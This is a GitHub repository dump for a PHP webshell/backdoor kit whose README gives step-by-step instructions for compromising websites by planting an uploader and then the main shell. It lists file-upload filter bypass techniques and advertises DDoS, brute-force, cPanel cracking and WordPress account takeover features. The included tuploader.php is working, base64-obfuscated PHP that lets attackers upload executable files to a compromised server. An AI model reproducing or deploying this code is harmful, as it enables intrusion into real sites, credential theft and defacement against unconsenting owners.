├── LICENSE ├── README.md ├── TermuxHackz-WebShell ├── Payload_image.png ├── READ_ME_FIRST!!.txt ├── config ├── ths1335.pHp └── tuploader.php ├── donations.jpeg ├── images ├── qrcode └── received_1065724630950464.jpeg ├── ths1.png ├── ths2.png └── ths3.png /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 AnonyminHack5 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Php-Webshell/Backdoor 2 | 3 | A PHP webshell created by us TermuxHackz Society. For educational and/or testing purposes only. 4 | Can also be used for ctf challenges, which has uploader and main shell. (ths1335.php) 5 | 6 | # Note 7 | #### [+] Always investigate malware in a secure environment. This means: separately from your network and in a virtual machine! 8 | #### [+] Some backdoors may be backdoored (yes, really). Don't ever use this for any malicious purposes. 9 | #### [+] The backdoors follow the format: Backdoorname_SHA1.php, granted the name of the backdoor is known 10 | #### [+] The folder TermuxHackz Webshell contains the webshell (uploader and main shell[ths1335 shell]). 11 | #### [+] Dont just be a defacer alone!, do cool shits with the webshell. But can also be used for defacing 12 | 13 | # Created by 14 | TermuxHackz Society Team Members - AnonyminHack5 15 |

16 | Ths1335.php is a powerful webshell which has several and multiple features which are useful for spammers, defacers and also 17 | useful for those who loves to try cool shits too haha ^_^. It contains, Fake Mailer, Whois scan, iplookup, Cracking Cpanel, Whm, Admin Panel Finder and so much more. This help bypass site security and not like other shells. 18 | 19 | # Steps to use this webshell 20 | ``` 21 | 1) Hack the site admin panel or look for site with upload option (for uploading pics, images, etc) 22 | 2) Look for upload section 23 | 3) First try to upload the Tuploader.php into the site 24 | If the site restricts php files, and says only png, jpeg or jpg images allowed 25 | Then next step is for you to upload the payload-image.png or try some file upload bypass like tuploader.pHp, tuploader.phtml etc 26 | 27 | 28 | The payload-image.png is an injected code for the php file 29 | So once the png image has been successfully uploaded 30 | But if the payload-image doesnt work. Use some file upload bypass tricks 31 | 32 | 4) Copy the image/shell location 33 | 5) Open in a tab 34 | 6) Then once you see the uploader 35 | 7) Upload the main shell which is the ths1335.php 36 | 8) Then you can use the shell.. 37 | 38 | Hahah, make sure you use with care!! 39 | ``` 40 | # File Upload Bypass 41 |

File Upload General Methodology

42 | Other useful extensions:
43 | PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc
44 | ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
45 | Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
46 | Coldfusion: .cfm, .cfml, .cfc, .dbm
47 | Flash: .swf
48 | Perl: .pl, .cgi
49 | Erlang Yaws Web Server: .yaws
50 |
51 |

Bypass file extensions checks

52 | 1) If they apply, the check the previous extensions. Also test them using some uppercase letters: pHp, .pHP5, .PhAr ..
53 | 2) Check adding a valid extension before the execution extension (use previous extensions also):

54 | 55 | file.png.php 56 | file.png.Php5 57 | 58 |
59 | 3) Try adding special characters at the end. You could use Burp to bruteforce all the ascii and Unicode characters. (Note that you can also try to use the previously motioned extensions)
60 |
61 | 62 | file.php%20
63 | file.php%0a
64 | file.php%00
65 | file.php%0d%0a
66 | file.php/
67 | file.php.\
68 | file.
69 | file.php....
70 | file.pHp5...
71 |
72 |
73 | 4) Try to bypass the protections tricking the extension parser of the server-side with techniques like doubling the extension or adding junk data (null bytes) between extensions. You can also use the previous extensions to prepare a better payload.
74 |
75 | 76 | file.png.php
77 | file.png.pHp5
78 | file.php%00.png
79 | file.php\x00.png
80 | file.php%0a.png
81 | file.php%0d%0a.png
82 | flile.phpJunk123png
83 |

84 |
85 | 5) Add another layer of extensions to the previous check:
86 |
87 | file.png.jpg.php 88 | file.php%00.png%00.jpg 89 | 90 |
91 | 6) Try to put the exec extension before the valid extension and pray so the server is misconfigured. **(useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php** will execute code):
92 |
93 | ex: file.php.png 94 | 95 |
96 | 7) Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character “:” will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. “file.asax:.jpg”). This file might be edited later using other techniques such as using its short filename. The “::$data” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. “file.asp::$data.”)

97 | 8) Try to break the filename limits. The valid extension gets cut off. And the malicious PHP gets left. AAA<--SNIP-->AAA.php
98 | 99 | ``` 100 | # Linux maximum 255 bytes 101 | /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255 102 | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png 103 | # Upload the file and check response how many characters it alllows. Let's say 236 104 | python -c 'print "A" * 232' 105 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 106 | # Make the payload 107 | AAA<--SNIP 232 A-->AAA.php.png 108 | ``` 109 | 110 |

Bypass Content-Type & magic number

111 | 1) Bypass Content-Type checks by setting the value of the Content-Type header to: image/png , text/plain , application/octet-stream
112 |
113 | >> Content-Type wordlist: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt
114 |
115 | 2) Bypass magic number check by adding at the beginning of the file the bytes of a real image (confuse the file command). Or introduce the shell inside the metadata: exiftool -Comment=" 116 |
117 | 118 | Or you can try other tricks you know that might work. Haha 119 |
120 | # Some features of ths1335 Shell 121 | 1) File Manager 122 | 2) Dumping SQL database 123 | 3) Find admin panel page 124 | 4) Execute ssh commands on remote server 125 | 5) TCP and UDP flood ddos 126 | 6) CGI Shell 127 | 7) Ftp brute force 128 | 8) Cracking Cpanels and Whmpanels 129 | 9) Crack WordPress sites and change all usernames and password 130 | 10) Code Injector 131 | 11) And so much fuckin more hahahaha 132 | 133 | 134 | # Ths1335 Shell Images 135 | ![](ths1.png) 136 | 137 | ![](ths2.png) 138 | 139 | ![](ths3.png) 140 | 141 | # License 142 | ths1335.php shell is under the MIT license. This webshell is free for all use and for home and educational usages as well. Thanks to our team of skilled programmers hahaha. 143 | 144 | Incase you dont like to clone from github, haha, you can download the TermuxHackz Webshell zip from mediafire.

145 | Download here:- Download TermuxHackz WebShell here. 146 | 147 |

Kindly star or fork this repo, to support us for this wonderful project

148 | 149 | # Donate 150 | ![](donations.jpeg) 151 | Donate to us if you love and appreciate the project. Donate here. Thanks for donations.... 152 | 153 | 154 | # Version 155 | ``` 156 | Version 1.0 157 | ``` 158 | 159 | # Join our groups 160 | Join our Telegram group: here
161 | Visit our Site
162 | Join our facebook group: here
163 | Join our telegram Channel also by scanning the qr code below
164 | 165 | ![](images/received_1065724630950464.jpeg) 166 | 167 | # Notice Bugs? 168 | If you use our webshell and you notice bugs in em feel free to email me those bugs and We will try fix them. 169 | Report those bugs to me here. 170 | 171 |
Thanks alot for the support
172 | 173 | # Faqs 174 | ##### 1) Some features doesn't work? 175 | If you notice that some features of the shell doesnt work, Try using a linux system with a good internet connection 📶 and try again. It should work. Using a windows system with this powerful webshell is limited. Thanks :) 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | -------------------------------------------------------------------------------- /TermuxHackz-WebShell/Payload_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TermuxHackz/WebShell/5653982849b3f2d7c0dd1d686dda6aa4991253a2/TermuxHackz-WebShell/Payload_image.png -------------------------------------------------------------------------------- /TermuxHackz-WebShell/READ_ME_FIRST!!.txt: -------------------------------------------------------------------------------- 1 | This webshell was created by TermuxHackz Society Team Members 2 | 3 | Steps to use this shell 4 | 5 | 1) Hack the site admin panel or look for site with upload option (for uploading pics, images, etc) 6 | 2) Look for upload section 7 | 3) First try to upload the Tuploader.php into the site 8 | If the site restricts php files, and says only png, jpeg or jpg images allowed 9 | Then next step is for you to upload the payload-image.png or try some file upload bypass like tuploader.pHp, tuploader.phtml etc 10 | 11 | 12 | The payload-image.png is an injected code for the php file 13 | So once the png image has been successfully uploaded 14 | But if the payload-image doesnt work. Use some file upload bypass tricks 15 | 16 | 4) Copy the image/shell location 17 | 5) Open in a tab 18 | 6) Then once you see the uploader 19 | 7) Upload the main shell which is the ths1335.php 20 | 8) Then you can use the shell.. 21 | 22 | Hahah, make sure you use with care!! 23 | 24 | ///// 25 | Created by TermuxHackz Society Team Members... 26 | ///// 27 | Fuck the system 28 | Breaking web firewalls!!! -------------------------------------------------------------------------------- /TermuxHackz-WebShell/config: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /TermuxHackz-WebShell/tuploader.php: -------------------------------------------------------------------------------- 1 | ".base64_decode("
<?php ${"\x47L\x4fB\x41\x4c\x53"}["y\x62\x72\x68o\x65a\x63\x67\x7ay\x6du\x5fs\x62\x6dx\x78\x6bo\x78\x5f\x70\x62w\x73m\x73t\x5fd\x67\x73v"]="_\x53E\x52V\x45R";${"\x47\x4cO\x42A\x4cS"}["p\x76\x5f\x61k\x76e\x68a\x64x\x62\x61\x69\x6fx\x66\x7ar\x5f\x70_\x79u\x74m\x67\x72n\x78p\x63"]="\x5fF\x49\x4cE\x53";${"\x47L\x4fB\x41L\x53"}["\x65\x6d\x7ax\x65\x6en\x6fx\x67o\x68n\x5fb\x76\x68d\x68\x6d_\x61f\x64"]="\x6ee\x77n\x61m\x65";${"\x47L\x4f\x42\x41L\x53"}["\x71p\x73d\x67g\x72b\x6av\x6dr\x64e\x65k\x76h\x78\x76p\x5f\x6bq\x7at\x62"]="\x65r\x72o\x72\x73";${"G\x4cO\x42A\x4c\x53"}["\x63m\x72v\x5fi\x75\x6d\x76w\x68\x6a\x79u\x78w\x77n\x6d\x67\x64s\x73\x6fh\x77x"]="\x66i\x6c\x65_\x65x\x74";${"\x47\x4c\x4f\x42A\x4c\x53"}["w\x74\x7a\x6eh\x67\x72d\x67\x70r\x6ak\x66c\x6af\x74i\x6b_\x77\x6ca\x77"]="\x65x\x74e\x6e\x73i\x6f\x6es";?><?php   ?><!DOCTYPE html><meta name="viewport" content="width=device-width initial-scale=1"><meta charset="utf-8"><head><title>---[<<-T-Uploader-->>]----</title></head><style>.left {	text-align: left;	color: white;	font-size: 16px;
}</style><html><body><style>* {
padding: 0;
margin: 0;
font-family: Tahoma, Verdana, sans-serif;
}
body {
color: lightgreen;
font-family: Tahoma, Verdana, sans-serif;
}
.container {
display: block;
}
.text1 {
color: orange;
font-size: 60px;
font-weight: 900;
font-family: serif;
text-align: center;
letter-spacing: 6px;
animation: effect 2s linear infinite;
cursor: pointer;
}
@keyframes effect {	0% {	color: orange;	-webkit-background-clip: text;	}	20% {	color: lightgreen;	font-weight: bold;	}	50% {	color: #3ce7d7;	-webkit-background-clip: text;	}	60% {	color: blue;	-webkit-background-clip: text;	}	70% {	color: cyan;	}	100% {	color: linear-gradient(#3ce7d7, #000fff);	-webkit-background-clip: text;	}
}
a {	color: lightblue;	text-decoration: none;
}</style><br><br><style>body {
background: #333;
font-family: "Lucida Console", "Courier New", monospace;
font-size: 16px;
text-align: center;
color: lightgreen;
}
.button-3 { appearance: none; background-color: #2ea44f; border: 1px solid rgba(27, 31, 35, .15); border-radius: 6px; box-shadow: rgba(27, 31, 35, .1) 0 1px 0; box-sizing: border-box; color: #fff; cursor: pointer; display: inline-block; font-family: -apple-system,system-ui,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji"; font-size: 14px; font-weight: 600; line-height: 20px; padding: 6px 16px; position: relative; text-align: center; text-decoration: none; user-select: none; -webkit-user-select: none; touch-action: manipulation; vertical-align: middle; white-space: nowrap;
}
.button-3:focus:not(:focus-visible):not(.focus-visible) { box-shadow: none; outline: none;
}
.button-3:hover { background-color: #2c974b;
}
.button-3:focus { box-shadow: rgba(46, 164, 79, .4) 0 0 0 3px; outline: none;
}
.button-3:disabled { background-color: #94d3a2; border-color: rgba(27, 31, 35, .1); color: rgba(255, 255, 255, .8); cursor: default;
}
.button-3:active { background-color: #298e46; box-shadow: rgba(20, 70, 32, .2) 0 1px 0 inset;
}</style><?php  error_reporting(0);ini_set('display_errors',0) ?><h3 class="text1">T-UPLOADER</h3><span class="text2">Created by TermuxHackz Society</span><form action="<?php echo ${${"G\x4c\x4f\x42A\x4c\x53"}["y\x62\x72\x68o\x65a\x63\x67\x7ay\x6du\x5fs\x62\x6dx\x78\x6bo\x78\x5f\x70\x62w\x73m\x73t\x5fd\x67\x73v"]}['PHP_SELF'] ?>" method="POST" enctype="multipart/form-data"><label class="col-md-3 control-label">Upload file</label><input type="file" name="attachment" class="form-control-file" /><button type="submit" role="button" class="button-3">Upload</button></form><br/><br/><br><br><?php if(is_uploaded_file(${${"G\x4cO\x42A\x4cS"}["p\x76\x5f\x61k\x76e\x68a\x64x\x62\x61\x69\x6fx\x66\x7ar\x5f\x70_\x79u\x74m\x67\x72n\x78p\x63"]}['attachment']['tmp_name'])){${${"\x47L\x4fB\x41L\x53"}["\x65\x6d\x7ax\x65\x6en\x6fx\x67o\x68n\x5fb\x76\x68d\x68\x6d_\x61f\x64"]}=dirname(__FILE__)."\x2f".basename(${${"G\x4c\x4fB\x41L\x53"}["p\x76\x5f\x61k\x76e\x68a\x64x\x62\x61\x69\x6fx\x66\x7ar\x5f\x70_\x79u\x74m\x67\x72n\x78p\x63"]}['attachment']['name']);if(${${"G\x4c\x4fB\x41L\x53"}["p\x76\x5f\x61k\x76e\x68a\x64x\x62\x61\x69\x6fx\x66\x7ar\x5f\x70_\x79u\x74m\x67\x72n\x78p\x63"]}['attachment']['size']>1073741824){${${"G\x4cO\x42A\x4cS"}["\x71p\x73d\x67g\x72b\x6av\x6dr\x64e\x65k\x76h\x78\x76p\x5f\x6bq\x7at\x62"]}[]="\x46\x69\x6ce\x20s\x69\x7a\x65 \x6d\x75\x73t\x20b\x65\x20e\x78\x61\x63t\x6c\x79\x201\x47\x42";}${${"\x47L\x4fB\x41\x4c\x53"}["\x63m\x72v\x5fi\x75\x6d\x76w\x68\x6a\x79u\x78w\x77n\x6d\x67\x64s\x73\x6fh\x77x"]}=strtolower(end(explode('.',${${"\x47\x4cO\x42A\x4cS"}["p\x76\x5f\x61k\x76e\x68a\x64x\x62\x61\x69\x6fx\x66\x7ar\x5f\x70_\x79u\x74m\x67\x72n\x78p\x63"]}['attachment']['name'])));${${"G\x4c\x4f\x42A\x4cS"}["w\x74\x7a\x6eh\x67\x72d\x67\x70r\x6ak\x66c\x6af\x74i\x6b_\x77\x6ca\x77"]}=array("pdf","doc","jpg","png","txt","php","mp4","mp3","asp","docx","html","mhtml","zip","rar");if(in_array(${${"G\x4cO\x42A\x4c\x53"}["\x63m\x72v\x5fi\x75\x6d\x76w\x68\x6a\x79u\x78w\x77n\x6d\x67\x64s\x73\x6fh\x77x"]},${${"G\x4cO\x42\x41\x4cS"}["w\x74\x7a\x6eh\x67\x72d\x67\x70r\x6ak\x66c\x6af\x74i\x6b_\x77\x6ca\x77"]})===false){${${"\x47\x4cO\x42A\x4cS"}["\x71p\x73d\x67g\x72b\x6av\x6dr\x64e\x65k\x76h\x78\x76p\x5f\x6bq\x7at\x62"]}[]="F\x69l\x65\x20e\x78t\x65\x6es\x69\x6f\x6e \x6e\x6ft\x20a\x6cl\x6f\x77e\x64,\x20p\x6ce\x61\x73e\x20c\x68o\x6f\x73e\x20\x61 \x50D\x46,\x20D\x4fC\x2c\x20D\x4fC\x58,\x20J\x50\x47\x2c\x20P\x4eG\x2c \x54\x58T\x20\x66\x69l\x65.";}if(empty(${${"\x47L\x4fB\x41\x4c\x53"}["\x71p\x73d\x67g\x72b\x6av\x6dr\x64e\x65k\x76h\x78\x76p\x5f\x6bq\x7at\x62"]})==true){if(!(move_uploaded_file(${${"\x47L\x4f\x42A\x4c\x53"}["p\x76\x5f\x61k\x76e\x68a\x64x\x62\x61\x69\x6fx\x66\x7ar\x5f\x70_\x79u\x74m\x67\x72n\x78p\x63"]}['attachment']['tmp_name'],${${"\x47L\x4fB\x41L\x53"}["\x65\x6d\x7ax\x65\x6en\x6fx\x67o\x68n\x5fb\x76\x68d\x68\x6d_\x61f\x64"]}))){echo "<\x70\x3e\x45\x52R\x4fR\x3a \x20A\x20p\x72o\x62l\x65m\x20\x6f\x63c\x75\x72r\x65d\x20\x64u\x72\x69n\x67 \x66\x69\x6c\x65\x20u\x70\x6c\x6f\x61d\x21<\x2f\x70>\n";}else{echo "<\x62\x72\x3e";echo "\x3c\x70\x3e\x54\x68\x65\x20\x66\x69\x6c\x65\x20\x68\x61\x73\x20\x62\x65\x65\x6e\x20\x75\x70\x6c\x6f\x61\x64\x65\x64\x20\x74\x6f\x3a\x20{${${"\x47L\x4f\x42\x41L\x53"}["\x65\x6d\x7ax\x65\x6en\x6fx\x67o\x68n\x5fb\x76\x68d\x68\x6d_\x61f\x64"]}}\x3c\x2f\x70\x3e\n";}}else{print_r(${${"\x47L\x4fB\x41L\x53"}["\x71p\x73d\x67g\x72b\x6av\x6dr\x64e\x65k\x76h\x78\x76p\x5f\x6bq\x7at\x62"]});}} ?></body></html>
")); ?> -------------------------------------------------------------------------------- /donations.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TermuxHackz/WebShell/5653982849b3f2d7c0dd1d686dda6aa4991253a2/donations.jpeg -------------------------------------------------------------------------------- /images/qrcode: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /images/received_1065724630950464.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TermuxHackz/WebShell/5653982849b3f2d7c0dd1d686dda6aa4991253a2/images/received_1065724630950464.jpeg -------------------------------------------------------------------------------- /ths1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TermuxHackz/WebShell/5653982849b3f2d7c0dd1d686dda6aa4991253a2/ths1.png -------------------------------------------------------------------------------- /ths2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TermuxHackz/WebShell/5653982849b3f2d7c0dd1d686dda6aa4991253a2/ths2.png -------------------------------------------------------------------------------- /ths3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TermuxHackz/WebShell/5653982849b3f2d7c0dd1d686dda6aa4991253a2/ths3.png --------------------------------------------------------------------------------